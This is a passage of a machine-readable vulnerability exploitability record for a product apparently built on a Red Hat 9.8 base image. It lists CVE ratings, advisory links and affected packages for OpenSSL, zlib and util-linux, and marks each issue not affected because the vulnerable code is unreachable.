          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/openssl@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:rpm/redhat/openssl-fips-provider-so@3.0.7-11.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:rpm/redhat/openssl-fips-provider@3.0.7-11.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:rpm/redhat/openssl-libs@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:rpm/redhat/openssl@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/openssl-fips-provider-so@3.0.7-11.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/openssl-fips-provider@3.0.7-11.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/openssl-libs@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/openssl@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/openssl-fips-provider-so@3.0.7-11.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/openssl-fips-provider@3.0.7-11.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/openssl-libs@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/openssl@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:1080078b-bf88-4505-a133-1abe47582404/1#pkg:rpm/redhat/openssl-fips-provider-so@3.0.7-11.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:1080078b-bf88-4505-a133-1abe47582404/1#pkg:rpm/redhat/openssl-fips-provider@3.0.7-11.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:1080078b-bf88-4505-a133-1abe47582404/1#pkg:rpm/redhat/openssl-libs@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:1080078b-bf88-4505-a133-1abe47582404/1#pkg:rpm/redhat/openssl@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-27171",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 5.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 5.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 3.3,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "low"
        }
      ],
      "cwes": [
        1284
      ],
      "description": "zlib before 1.3.2 allows CPU consumption via crc32_combine64 and crc32_combine_gen64 because x2nmodp can do right shifts within a loop that has no termination condition.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-27171"
        },
        {
          "url": "https://7asecurity.com/blog/2026/02/zlib-7asecurity-audit"
        },
        {
          "url": "https://7asecurity.com/blog/2026/02/zlib-7asecurity-audit/"
        },
        {
          "url": "https://7asecurity.com/reports/pentest-report-zlib-RC1.1.pdf"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-27171"
        },
        {
          "url": "https://github.com/advisories/GHSA-h858-mf2m-8jf4"
        },
        {
          "url": "https://github.com/madler/zlib/issues/904"
        },
        {
          "url": "https://github.com/madler/zlib/releases/tag/v1.3.2"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27171"
        },
        {
          "url": "https://ostif.org/zlib-audit-complete"
        },
        {
          "url": "https://ostif.org/zlib-audit-complete/"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-27171"
        }
      ],
      "published": "2026-02-18T04:16:01+00:00",
      "updated": "2026-06-17T10:26:47+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/zlib@1.2.11-40.el9?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "1.2.11-40.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/zlib@1.2.11-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:rpm/redhat/zlib@1.2.11-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#pkg:rpm/redhat/zlib@1.2.11-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/zlib@1.2.11-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/zlib@1.2.11-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/zlib@1.2.11-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/zlib@1.2.11-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/zlib@1.2.11-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/zlib@1.2.11-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/zlib@1.2.11-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/zlib@1.2.11-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/zlib@1.2.11-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/zlib@1.2.11-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:rpm/redhat/zlib@1.2.11-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/zlib@1.2.11-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/zlib@1.2.11-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:1080078b-bf88-4505-a133-1abe47582404/1#pkg:rpm/redhat/zlib@1.2.11-40.el9?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-27456",
      "ratings": [
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "bottlerocket"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 4.7,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 4.7,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        59,
        269,
        367
      ],
      "description": "util-linux is a random collection of Linux utilities. Prior to version 2.41.4, a TOCTOU (Time-of-Check-Time-of-Use) vulnerability has been identified in the SUID binary /usr/bin/mount from util-linux. The mount binary, when setting up loop devices, validates the source file path with user privileges via fork() + setuid() + realpath(), but subsequently re-canonicalizes and opens it with root privileges (euid=0) without verifying that the path has not been replaced between both operations. Neither O_NOFOLLOW, nor inode comparison, nor post-open fstat() are employed. This allows a local unprivileged user to replace the source file with a symlink pointing to any root-owned file or device during the race window, causing the SUID binary to open and mount it as root. Exploitation requires an /etc/fstab entry with user,loop options whose path points to a directory where the attacker has write permission, and that /usr/bin/mount has the SUID bit set (the default configuration on virtually all Linux distributions). The impact is unauthorized read access to root-protected files and block devices, including backup images, disk volumes, and any file containing a valid filesystem. This issue has been patched in version 2.41.4.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-27456"
        },
        {
          "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27456"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-27456"
        },
        {
          "url": "https://github.com/bottlerocket-os/bottlerocket-core-kit/blob/develop/advisories/14.5.0/BRSA-jgcxwcxt3sxd.toml"
        },
        {
          "url": "https://github.com/util-linux/util-linux/commit/5e390467b26a3cf3fecc04e1a0d482dff3162fc4"
        },
        {
          "url": "https://github.com/util-linux/util-linux/releases/tag/v2.41.4"
        },
        {
          "url": "https://github.com/util-linux/util-linux/security/advisories/GHSA-qq4x-vfq4-9h9g"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27456"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-27456"
        }
      ],
      "published": "2026-04-03T22:16:25+00:00",
      "updated": "2026-07-24T22:10:00+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/libblkid@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "2.37.4-25.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/libfdisk@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "2.37.4-25.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/libmount@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "2.37.4-25.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/libsmartcols@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "2.37.4-25.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/libuuid@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "2.37.4-25.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/util-linux-core@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "2.37.4-25.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/util-linux@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "2.37.4-25.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/libblkid@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/libfdisk@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/libmount@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/libsmartcols@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/libuuid@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/util-linux-core@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/util-linux@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:rpm/redhat/libblkid@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:rpm/redhat/libfdisk@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:rpm/redhat/libmount@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:rpm/redhat/libsmartcols@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:rpm/redhat/libuuid@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:rpm/redhat/util-linux-core@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:rpm/redhat/util-linux@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#pkg:rpm/redhat/libblkid@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#pkg:rpm/redhat/libmount@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#pkg:rpm/redhat/libsmartcols@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#pkg:rpm/redhat/libuuid@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/libblkid@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/libfdisk@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/libmount@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/libsmartcols@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/libuuid@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/util-linux-core@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/util-linux@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/libblkid@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/libfdisk@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/libmount@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/libsmartcols@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/libuuid@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/util-linux-core@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/util-linux@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/libblkid@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/libfdisk@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/libmount@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/libsmartcols@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/libuuid@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/util-linux-core@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/util-linux@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/libblkid@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/libfdisk@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/libmount@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/libsmartcols@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/libuuid@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/util-linux-core@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/util-linux@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/libblkid@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/libfdisk@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/libmount@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/libsmartcols@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/libuuid@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/util-linux-core@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/util-linux@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/libblkid@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/libfdisk@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/libmount@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/libsmartcols@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/libuuid@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/util-linux-core@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/util-linux@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/libblkid@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/libfdisk@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/libmount@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/libsmartcols@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/libuuid@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/util-linux-core@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/util-linux@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/libblkid@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/libfdisk@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/libmount@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/libsmartcols@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/libuuid@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/util-linux-core@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/util-linux@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/libblkid@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/libfdisk@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/libmount@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/libsmartcols@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/libuuid@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/util-linux-core@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/util-linux@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/libblkid@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/libfdisk@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/libmount@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/libsmartcols@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
